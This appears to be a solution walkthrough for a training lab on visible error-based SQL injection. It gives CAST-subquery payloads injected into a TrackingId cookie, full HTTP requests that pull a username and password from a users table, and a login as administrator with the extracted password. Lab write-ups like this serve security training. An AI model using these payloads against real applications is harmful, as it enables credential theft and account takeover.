Visible error based SQL injection
Visible error-based SQL injection
Solution
Check basic payload
Payload: '
---
GET /product?productId=5 HTTP/2
Host: 0a7100d80300eef080d27b1000e800a2.web-security-academy.net
Cookie: TrackingId=46FKdlEJ83icXgsg'; session=5e9nKMvJtZoTVEgnT9ah0xF4s6dCpaJx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a7100d80300eef080d27b1000e800a2.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Create a subquery and cast returned value
Payload: ' AND 1=CAST((SELECT 1) AS int)--
___
GET /product?productId=5 HTTP/2
Host: 0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net
Cookie: TrackingId=Urlp96yA61HYv3fJ' AND 1=CAST((SELECT 1) AS int)--; session=koceK2naNiKVRHe18s5d4DimnzNBEVgR
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Get username from table users with limit 1
Payload: ' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
___
GET /product?productId=5 HTTP/2
Host: 0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net
Cookie: TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--; session=koceK2naNiKVRHe18s5d4DimnzNBEVgR
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Get password for username: administrator
Password: yg4d3vu8u24ahqednt67
Payload: ' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
___
GET /product?productId=5 HTTP/2
Host: 0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net
Cookie: TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--; session=koceK2naNiKVRHe18s5d4DimnzNBEVgR
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Login as user: administrator
L: administrator
P: yg4d3vu8u24ahqednt67
___
POST /login HTTP/2
Host: 0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net
Cookie: TrackingId=Urlp96yA61HYv3fJ; session=koceK2naNiKVRHe18s5d4DimnzNBEVgR
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: https://0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net
Referer: https://0ab200ce03e6aab8806f67cc0002009f.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
csrf=VVEQgZJQJv9gPtZdQh5Z49AewDlj9Equ&username=administrator&password=yg4d3vu8u24ahqednt67